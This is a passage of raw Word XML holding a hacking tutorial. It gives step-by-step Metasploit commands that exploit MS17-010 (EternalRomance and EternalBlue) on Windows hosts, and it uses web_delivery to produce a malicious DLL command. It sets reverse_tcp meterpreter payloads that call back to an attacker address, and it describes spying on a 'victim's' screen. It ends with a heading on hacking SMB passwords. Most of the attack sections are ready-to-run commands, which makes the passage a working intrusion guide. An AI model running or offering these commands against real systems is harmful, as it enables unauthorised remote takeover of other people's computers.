        <w:t>in their respective boxes. And then click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>; the whole victim’s PC’s screen will appear on your Desktop and you will have a pretty good view of what your victim is doing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B1141" w14:textId="01F5C616"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623A95D2" wp14:editId="5D7C3B24">
            <wp:extent cx="5731510" cy="43510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4351020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1C98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you can observe we are having Screen of victim’s machine in front of us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C411E" w14:textId="632450C1"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7C927320" wp14:editId="1633FAAC">
            <wp:extent cx="5731510" cy="54235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423535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AADAEA"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MS17-010 EternalRomance SMB Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D13A2"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Tested on: Windows 2007 ultimate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A06F26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Attacking Machine: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E87B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will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type of confusion between Transaction and write and requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit but requires a named pipe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8CAE5" w14:textId="568CF2DF"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9578AAA">
          <v:shape id="_x0000_i1352" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId85" w:name="DefaultOcxName91" w:shapeid="_x0000_i13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595"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="5CB6CEEA" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="708CB078"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605AE068"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lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="195FD684"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0CB54C8A"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224601A8"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8550" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72BA545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lastRenderedPageBreak/>
              <w:t>msf &gt; use exploit/windows/smb/ms17_010_psexec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71432E74"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lastRenderedPageBreak/>
              <w:t>msf exploit(windows/smb/ms17_010_psexec) &gt; set rhost 192.168.1.105</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3959FAAC"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exploit(windows/smb/ms17_010_psexec) &gt; set smbuser raj</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF26CEE"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exploit(windows/smb/ms17_010_psexec) &gt; set smbpass 123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E49B523"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exploit(windows/smb/ms17_010_psexec) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C2CC09F" w14:textId="5A1F7F74"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4E6F4EEF" wp14:editId="7F542514">
            <wp:extent cx="5731510" cy="40246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0BE676E5" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">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MS17-010 EternalRomance SMB Remote Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236BEEA8"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will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type of confusion between Transaction and write and requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit but requires a named pipe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF771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Thus, in a new Metasploit framework we had used web delivery module to get malicious dll code which we can use as an arbitrary command on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C78F2A5" w14:textId="0D9AF6B4"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1F3402FD">
          <v:shape id="_x0000_i1351" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId87" w:name="DefaultOcxName101" w:shapeid="_x0000_i13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FD1F03" w:rsidRPr="00873D4D" w14:paraId="1B934D8C" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37016175"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4B04A437"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0C1C9C3D"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40A283DC"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35A97580"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10815" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="410D7C87"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exploit/multi/script/web_delivery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D6F1664"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set target 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69BAE1E0"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set payload windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41784FA0"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set lhost 192.168.1.106</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9393A1"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exploit(multi/script/web_delivery) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D12C753"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Copy the highlighted text for malicious dll code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5475C8B1" w14:textId="3436094F"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2963676C" wp14:editId="12DC9B14">
            <wp:extent cx="5731510" cy="230886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45A10CC9" w14:textId="799195B4" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">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2730" w:dyaOrig="1395" w14:anchorId="658366F5">
          <v:shape id="_x0000_i1350" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId89" w:name="DefaultOcxName111" w:shapeid="_x0000_i13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FD1F03" w:rsidRPr="00873D4D" w14:paraId="6E223A4F" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E7456BB"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60302A5C"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32D5F0E0"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548698F7"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4AA72288"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p w14:paraId="08E49D57" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11580" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4574D597"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&gt; use auxiliary/admin/smb/ms17_010_command</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E32EA88"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auxiliary(admin/smb/ms17_010_command) &gt; set rhosts 192.168.1.105</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="725C33BA"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auxiliary(admin/smb/ms17_010_command) &gt; set smbuser raj</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56395BFB"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auxiliary(admin/smb/ms17_010_command) &gt; set smbpass 123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="718A9E4C"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auxiliary(admin/smb/ms17_010_command) &gt; set COMMAND [Paste above copied dll code here]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DE7BBF3" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">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auxiliary(admin/smb/ms17_010_command) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3223CB3B" w14:textId="08F1D8BB"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7D11C534" wp14:editId="13D5B79E">
            <wp:extent cx="5731510" cy="349694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496945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22386AE1"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soon as we run psexec auxiliary we will get a meterpreter session with as an administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69690869"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In this way, we can compromise a victim’s machine remotely if we have login credential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7499B4" w14:textId="77777777"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Happy Hacking!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D398E5D" w14:textId="1DB6710B" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">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2DC753ED" wp14:editId="03743F8B">
            <wp:extent cx="5731510" cy="27546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6A56FE6B" w14:textId="7FD21E3B" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADEABBB" w14:textId="0B6EE6CD" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3898ECFD" w14:textId="5DC86752" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C30A494" w14:textId="2126C245" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F79852" w14:textId="439B7807" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E587025" w14:textId="61D31FD8" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B798A97" w14:textId="00C6BCFE" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634D12BF" w14:textId="1ED50541" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D3741B6" w14:textId="7BE0DEAC" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCB5A8D" w14:textId="205DCCFC" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498D9977" w14:textId="584553BA" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A9FD2E" w14:textId="7262BC27" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFA7CC1" w14:textId="3690BCAC" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A2F40A" w14:textId="5BEA2887" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Windows 7 – Eternalblue SMB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67220648"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is a port of the Equation Group ETERNAL BLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memory operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F57EFE5"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Let’s start!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9AE1B6"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Attacker: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD1BB76"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Target: Window 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C118E7C"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Open the terminal in your Kali Linux type msfconsole to load Metasploit framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894051D" w14:textId="33996A29" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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1440" w:dyaOrig="1440" w14:anchorId="435D178B">
          <v:shape id="_x0000_i1374" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId92" w:name="DefaultOcxName19" w:shapeid="_x0000_i13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873D4D" w:rsidRPr="00873D4D" w14:paraId="59E09CA4" w14:textId="77777777" w:rsidTr="00873D4D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3194E9C0"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38D837C7"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msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18E62722" w14:textId="6DA6C078"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655D1120" wp14:editId="0D8976FF">
            <wp:extent cx="5731510" cy="252158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5077F7E0" w14:textId="09EAEF6B" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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1440" w:dyaOrig="1440" w14:anchorId="3E66EC77">
          <v:shape id="_x0000_i1373" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId94" w:name="DefaultOcxName18" w:shapeid="_x0000_i13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873D4D" w:rsidRPr="00873D4D" w14:paraId="22825853" w14:textId="77777777" w:rsidTr="00873D4D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="256D32E1"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6945A7CB"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30431095"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17DFE4F2"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035ECFF7"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="675CE51C"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exploit/windows/smb/ms17_010_eternalblue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71CE4DB8"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exploit(ms17_010_eternalblue) &gt;set rhost 192.168.1.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128870ED"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exploit(ms17_010_eternalblue) &gt;set 192.168.1.21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1760E8ED"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exploit(ms17_010_eternalblue) &gt;set payload windows/x64/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD481BE"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exploit(ms17_010_eternalblue) &gt;exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D833D31"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From the screenshot, you can see we have got a meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF8739" w14:textId="63B59B23" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">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1440" w:dyaOrig="1440" w14:anchorId="0D8A6408">
          <v:shape id="_x0000_i1372" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId95" w:name="DefaultOcxName23" w:shapeid="_x0000_i137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6690"/>
      </w:tblGrid>
      <w:tr w:rsidR="00873D4D" w:rsidRPr="00873D4D" w14:paraId="2B215D3B" w14:textId="77777777" w:rsidTr="00873D4D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A836A73"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6645" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E97A853"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meterpreter&gt; sysinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A027B8C" w14:textId="2A777B05"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112C2F5F" wp14:editId="3BEDBCF9">
            <wp:extent cx="5731510" cy="39014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901440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4121B1CA" w14:textId="1F8A780B" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2C0CF9" w14:textId="1AFA712B" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D447C1" w14:textId="2ED17561" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3490E1E8" w14:textId="353748B0" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EC65C0" w14:textId="1C083A1D" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02AA2954" w14:textId="5500373C" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3022EC1D" w14:textId="46C8D652" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5666D7" w14:textId="77777777" w:rsidR="00873D4D" w:rsidRPr="00873D4D" w:rsidRDefault="00873D4D" w:rsidP="00873D4D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="96"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5 Ways to Hack SMB Login Password</w:t>
      </w:r>
    </w:p>
